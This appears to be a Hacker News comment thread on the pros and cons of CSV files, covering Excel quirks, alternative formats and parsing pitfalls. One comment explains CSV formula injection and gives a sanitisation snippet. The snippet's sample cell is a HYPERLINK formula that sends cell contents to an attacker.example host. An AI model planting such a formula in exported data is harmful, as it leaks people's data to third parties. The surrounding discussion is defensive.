CSVs: The Good, the Bad, and the Ugly

89 points by goranmoomin over 4 years ago

20 comments

jacobsenscott over 4 years ago
CSVs are the worst and only option for data exchange in 99% of the cases.

Most CSVs travel through Excel at some point in their lives, so we need to talk about Excel:

Excel neither reads nor writes UTF-8 CSV files without jumping through hoops.

Excel saves files in different character sets on macOS and Windows.

Excel tries to interpret fields with digits as numbers, stripping off leading 0's, etc. (think serial numbers or whatever with leading 0's).

Excel will try to interpret date fields and write them out in a different format.

Outside of Excel:

There is no way to know what character set a CSV file is encoded in. You can only guess.

UTF BOM - sometimes there, sometimes not.

If the file is malformed but still opens in Excel, it is a bug in your CSV parser and not a problem with the producer of the file (so they will tell you).

Most CSV libraries are extremely buggy and cannot generate CSV to spec.

Most CSV libraries are extremely buggy and cannot read CSV that meets spec.

Many programmers think CSV is easy and do not use a library to generate or read CSV, producing even worse results than their language's buggy CSV library.

The spec is just a suggestion.

Nobody reads the spec.

That's just the tip of the iceberg.
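The leading-zero problem is not limited to Excel: any CSV reader that infers column types will do the same. A minimal sketch with pandas (the column names are made up for illustration):

    import io
    import pandas as pd

    csv_data = "serial,qty\n00123,5\n04567,2\n"

    # Default type inference turns the serial numbers into the integers 123 and 4567
    inferred = pd.read_csv(io.StringIO(csv_data))
    print(inferred["serial"].tolist())   # [123, 4567] -- leading zeros gone

    # Forcing the column to str preserves the original values
    preserved = pd.read_csv(io.StringIO(csv_data), dtype={"serial": str})
    print(preserved["serial"].tolist())  # ['00123', '04567']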
undecisive over 4 years ago
I was hoping to see some mention of the security downsides of CSVs - something that, as a programmer of over 10 years' experience, I wasn't aware of until a couple of years ago.

If you hand a CSV to a normal person, they'll open it in MS Office. Or LibreOffice.

If you put a formula into any cell starting with an `=` character, the office suite will give you a terse warning about updates or something, and when you accept, it will run every formula.

For example, you could write a formula to convert cells A1:D10 to params and make a GET request to an address on your personal server. If the CSV contains user-submitted data, e.g. if someone has set that formula as their name, and the CSV hasn't been carefully sanitised, then when you hand someone from the business your CSV to build some sort of report, they may well be sending much of the data to a third party.

While maybe not a CSV-specific issue, CSVs are certainly believed to be safe (it's just a text file! We're only using it internally!). They really are not safe, and it sometimes takes a non-trivial amount of work to make them safe.
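A common mitigation (a sketch of one approach, not a complete defence) is to neutralise any cell a spreadsheet might treat as a formula before the CSV is written, typically by prefixing it with a single quote:

    import csv
    import io

    # Characters Excel/LibreOffice may interpret as the start of a formula
    FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

    def sanitise_cell(value: str) -> str:
        # Prefix suspicious cells so the spreadsheet displays them as plain text
        return "'" + value if value.startswith(FORMULA_PREFIXES) else value

    rows = [
        ["name", "comment"],
        ["Alice", "fine"],
        ['=HYPERLINK("http://attacker.example/?"&A1,"click me")', "user-submitted"],
    ]

    out = io.StringIO()
    csv.writer(out).writerows([[sanitise_cell(cell) for cell in row] for row in rows])
    print(out.getvalue())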
rav over 4 years ago
    Line-delimited JSON works, but imposes a high size overhead (field names
    are repeated for every record) and is not well supported in
    non-programming environments.

The article only discussed line-delimited JSON objects. How about line-delimited JSON arrays? You put the field names in an array on the first line, and the values in arrays on the subsequent lines.

Although in my day-to-day, the overhead of field names is rarely problematic.
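For illustration, the array-per-line scheme the comment describes might look like this (a sketch, not an established format):

    import json

    rows = [{"name": "Alice", "born": "2020-01-01"},
            {"name": "Bob", "born": "2020-01-02"}]

    fields = list(rows[0])

    # First line: JSON array of field names; every other line: JSON array of values
    lines = [json.dumps(fields)]
    lines += [json.dumps([row[f] for f in fields]) for row in rows]
    print("\n".join(lines))
    # ["name", "born"]
    # ["Alice", "2020-01-01"]
    # ["Bob", "2020-01-02"]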
captrb over 4 years ago
"Parquet files work well, but streaming is a tad more complex (you need to be able to seek to the end of the file to read the metadata before you can stream the contents)"

I didn't realize that all the metadata in Parquet was stored at the end. That is indeed unfortunate for streaming use cases. Especially sad because columnar dictionary formats can offer great compaction for some data. I've been achieving 20x+ size reductions by converting from CSV to Parquet.
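For reference, the CSV-to-Parquet conversion itself is a one-liner with pandas and pyarrow (file names are placeholders; the actual size reduction depends heavily on the data):

    import pandas as pd

    # Read the CSV and write a compressed, dictionary-encoded Parquet file
    df = pd.read_csv("input.csv")
    df.to_parquet("output.parquet", compression="snappy")  # needs pyarrow or fastparquet installed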
chubot over 4 years ago
"Ultimately there's no format that corrects all of CSV's flaws while retaining its benefits."

I'm planning to fix this with https://www.oilshell.org/ !

Eliminating the need for ad hoc parsing and splitting is one of the Four Features That Justify a New Unix Shell: http://www.oilshell.org/blog/2020/10/osh-features.html

I've designed a format called QTSV (quoted TSV) which lets you embed newlines and tabs in fields. It's built on QSN (quoted string notation), which is essentially just Rust string literals:

http://www.oilshell.org/release/latest/doc/qsn.html

QSN is fully implemented, but QTSV isn't done yet. Proposal here:

https://github.com/oilshell/oil/wiki/TSV2-Proposal

However, the latest Oil release actually does emit QTSV! The "pp" builtin (for pretty-print) will print a QTSV file of shell function names (procs) and their doc comments (like docstrings).

----

If you'd like this to be a reality, contact me and help out! Useful things to do:

- write a messy CSV to strict QTSV converter (it will need some flags for the heuristics, like Python's CSV library)
- write a QTSV library in your language

[1] https://www.oilshell.org/release/0.8.4/
sharpercoder over 4 years ago
We can still decide to start using the ASCII separator control characters 28-31 (octal 34-37): the file, group, record, and unit separators. Sure, we'll need to deal with TSV and CSV backward compat. But at least we won't have any escaping problems and can do very simple parsing.
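A sketch of what that looks like in practice, using the unit separator (0x1F) between fields and the record separator (0x1E) between records:

    US = "\x1f"  # unit separator: between fields
    RS = "\x1e"  # record separator: between records

    rows = [["name", "note"],
            ["Alice", "likes, commas"],
            ["Bob", "line one\nline two"]]

    # Serialise: no quoting or escaping needed as long as values never contain US/RS
    blob = RS.join(US.join(fields) for fields in rows)

    # Parse: two plain splits recover the original structure
    parsed = [record.split(US) for record in blob.split(RS)]
    assert parsed == rows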
simonebrunozzi over 4 years ago
Slightly tangential, but my feeling is that most people don't know where the "the good, the bad, the ugly" expression comes from.

It's a "spaghetti western" movie [0], directed by Sergio Leone, released in 1966, and credited with Clint Eastwood's rise to fame.

If you have never watched it, I highly recommend it. In the genre, it is probably among the best.

The music was composed by Ennio Morricone, another pillar of Italian cinema and music, who died last July. One of the theme songs for the movie, "The Ecstasy of Gold", is very famous all around the world, and even Metallica has played it at some concerts. [1]

Also, an interesting detail from a Quora answer [2] - I wasn't aware of the filming locations until now:

> The term "spaghetti western" was used by American filmgoers and reviewers because most were produced and directed by Italian film-makers, many of them trying to copy Leone's unique style.

> Most were filmed on low budgets and shot at various locations around southern Italy and Spain. The Tabernas Desert and Cabo de Gata-Nijar were especially popular shooting locations.

[0]: https://en.wikipedia.org/wiki/The_Good,_the_Bad_and_the_Ugly

[1]: https://en.wikipedia.org/wiki/The_Ecstasy_of_Gold

[2]: https://www.quora.com/Where-does-the-expression-the-good-bad-and-ugly-come-from#:~:text=The%20title%20refers%20to%20the,influential%20western%20movies%20ever%20made
orev over 4 years ago
You can get away with structured formats only when everything is fully automated, which works for APIs, but anything that needs human review will almost always be opened in Excel. That rules out anything fancy like JSON. Excel supports XML, but I think most people don't know how to use that, and I suspect it would only be useful for simple tabular data — not complex structures. Many/most business processes are not 100% automated, so you just have to fall back on something that works with standard business tools (Excel).
LukeEF over 4 years ago
Luke from TerminusDB here - we've been building automatic import and versioning features for CSVs over the last number of months. Just went into canary release, actually.

I agree very strongly with the benefits and problems of CSVs in the article. CSVs are crazy flexible, and if you are a team with a high velocity of changes and experiments with data, then it can make your life easier to work with CSVs (versus the other options).

Terminus is a straight-up open source graph database with revision control at the core. We noticed the CSV (and at best append to Git) problem when we were developing the solution. Loads of teams (irl) use CSVs + email for the storage and distribution of data (and features).

What happens is:

Data versioning is required but not uniformly specified or facilitated. It ends up being a suffix on a file, rather than a proper version-controlled system as is now common with code.

Data communication is undertaken by sending large files via Slack or e-mail. This means multiple inconsistent versions can float around the team without any visibility to project managers, and without any assurance that what you have is the latest version.

(As per the article and some comments) CSVs contain no type information, so information is routinely marshaled into and out of formats, leading to extra "cleaning" time and hard-to-find errors (NaNs) which may not even appear in the final feature selection.

Apparently 'best practice' is to put all changes back into the data warehouse, but the reality is a 'shadow data' economy within enterprises and an open CSV economy in startups. We are all about bridging those worlds: give you a GitHub-like way to manage your CSVs so they are version controlled, and give the team the ability to see who is making changes. The ability to work offline and then sync up later (like pushing in Git) is a really important aspect.

It can really help with CSV problems (we know, as the first thing we did was shove all our CSVs into TerminusHub).
pmoriarty over 4 years ago
I never got why TSVs aren't more popular.

TSVs are exactly like CSVs, but use TABs instead of commas as delimiters.

This simply and elegantly solves one major issue with CSVs, which is that commas are quite common in real data. TABs, in contrast, are not.

It's not perfect, but it's a simple, real-world solution that popular software packages (like Excel) which consume CSVs will readily recognize.
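For what it's worth, Python's standard csv module already speaks TSV via its built-in excel-tab dialect; a small sketch:

    import csv
    import io

    rows = [["name", "address"], ["Alice", "1 Main St, Springfield"]]

    # Write TSV: the comma in the address needs no quoting at all
    buf = io.StringIO()
    csv.writer(buf, dialect="excel-tab").writerows(rows)
    print(repr(buf.getvalue()))  # 'name\taddress\r\nAlice\t1 Main St, Springfield\r\n'

    # Read it back
    buf.seek(0)
    assert list(csv.reader(buf, dialect="excel-tab")) == rows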
rattray over 4 years ago
The worst thing, to me, mentioned in "Bad" is that CSVs are untyped, which especially makes distinguishing nulls and empty strings impossible.

I wonder if a "typed CSV" standard could emerge, like `.tcsv`, e.g.:

    Name::String?,ID::String,Born::Date
    Foo,0123,2020-01-01
    \NULL,0124,2020-01-02

Still streamable, human-readable/editable (although not with Excel et al. until they are modified to open it), compact, simple.

Of course, it would only be useful to actual Data People for a while, so it would not have ubiquity.
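A toy parser for that hypothetical header syntax (purely illustrative; the ::Type annotations and the \NULL marker are the commenter's proposal, not an existing standard):

    import csv
    import io
    from datetime import date

    raw = "Name::String?,ID::String,Born::Date\nFoo,0123,2020-01-01\n\\NULL,0124,2020-01-02\n"

    CASTS = {"String": str, "Date": date.fromisoformat}

    def parse_typed_csv(text):
        rows = csv.reader(io.StringIO(text))
        header = [col.split("::") for col in next(rows)]  # [['Name', 'String?'], ['ID', 'String'], ['Born', 'Date']]
        for row in rows:
            record = {}
            for (name, typ), value in zip(header, row):
                if typ.endswith("?") and value == "\\NULL":
                    record[name] = None          # nullable column, explicit null marker
                else:
                    record[name] = CASTS[typ.rstrip("?")](value)
            yield record

    for rec in parse_typed_csv(raw):
        print(rec)
    # {'Name': 'Foo', 'ID': '0123', 'Born': datetime.date(2020, 1, 1)}
    # {'Name': None, 'ID': '0124', 'Born': datetime.date(2020, 1, 2)}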
breck over 4 years ago
> the wrong delimiter

I personally try to always generate my data as SSVs. Occasionally I'll have a need for one column with multiple words, in which case I'll make it the last column, and it poses no parsing problems, as I always include the header and then can just parse the last column as the rest.

This means you need to be restrictive about the types in your data - which I've always found helps with a lot of other things anyway. No commas, no tabs, no newlines, no quotes - none of that is allowed in a value, and then you have nice clean data ready to parse, that is URL friendly, etc.

Of course, when I send my data back out into the world, I need to "compile" it to CSV, as almost no one uses SSV.

> CSVs have no types, everything is a string.

I think this will be solved in the next 10 years or so. We'll have something that's like Schema.org meets DefinitelyTyped. A "Common Tongue" for types, with a Wikipedia-like community and an easy syntax to extend at the last mile for defining your own dialect to suit your worldview.
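The "parse the last column as the rest" trick is just a bounded split; a sketch, assuming SSV here means space-separated values:

    header = "id status message"
    lines = [
        "1 ok all good",
        "2 error disk almost full on /var",
    ]

    columns = header.split()
    # maxsplit keeps everything after the first N-1 fields together as the final column
    rows = [dict(zip(columns, line.split(maxsplit=len(columns) - 1))) for line in lines]
    print(rows)
    # [{'id': '1', 'status': 'ok', 'message': 'all good'},
    #  {'id': '2', 'status': 'error', 'message': 'disk almost full on /var'}]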
drej over 4 years ago
That incorrect parsing of fields with newlines is real. Here's a demonstration of how you can essentially inject made-up data into someone's analysis if you know they will use the most popular Apache project and the de facto standard tool for big data processing (with default settings): https://kokes.github.io/blog/2020/06/12/high-performance-data-loss.html#lesson-6-all-bets-are-off
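The failure mode is easy to reproduce locally: a quoted field containing a newline is one record to a spec-compliant parser, but a naive line-based reader tears it in two, and the second half can look like a legitimate extra row. A small sketch:

    import csv
    import io

    data = 'name,score\n"Alice\n42,9000",1\n'

    # Spec-compliant parsing: one data row, the newline stays inside the quoted field
    print(list(csv.reader(io.StringIO(data))))
    # [['name', 'score'], ['Alice\n42,9000', '1']]

    # Naive line splitting: the quoted field is torn apart and '42,9000' looks like new data
    print([line.split(",") for line in data.splitlines()])
    # [['name', 'score'], ['"Alice'], ['42', '9000"', '1']]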
akbo over 4 years ago
You can stream AVRO records. AVRO is a well-defined, binary, space-efficient serialization format that can be used to serialize individual records (for streaming) or a whole set of records (for file storage). That should cover all of the author's requirements, right?

More info: https://www.confluent.io/blog/avro-kafka-data/
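For reference, writing and reading Avro with the third-party fastavro library looks roughly like this (a sketch; the schema and field names are made up, and nullability is expressed with a union type rather than a magic string):

    import io
    from fastavro import parse_schema, reader, writer

    schema = parse_schema({
        "type": "record",
        "name": "Person",
        "fields": [
            {"name": "name", "type": "string"},
            {"name": "born", "type": ["null", "string"], "default": None},  # a real null, unlike CSV
        ],
    })

    records = [{"name": "Alice", "born": "2020-01-01"}, {"name": "Bob", "born": None}]

    buf = io.BytesIO()
    writer(buf, schema, records)   # the schema travels with the data

    buf.seek(0)
    for rec in reader(buf):        # records come back as dicts with types preserved
        print(rec)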
framecowbird over 4 years ago
We use CSVs a lot, and a good schema for a metadata file would be very useful. Rather than making up my own, does anybody know of a good, well-adopted metadata format for CSV files? I found https://specs.frictionlessdata.io/tabular-data-package, but I'm not sure how widely used it is.
amelius over 4 years ago
If you want to know how ugly a format is, just look at all the options you have to enter correctly when you try to open it.
andi999 over 4 years ago
But don't forget, there are only two kinds of decimal separators in this world: those with commas and those with dots...
neonate over 4 years ago
https://archive.is/wQQ3h
neolog over 4 years ago
I've always wondered why Parquet and Arrow put metadata at the end.
pachico over 4 years ago
I thought it was already a standard to treat \NULL as null in CSV parsers.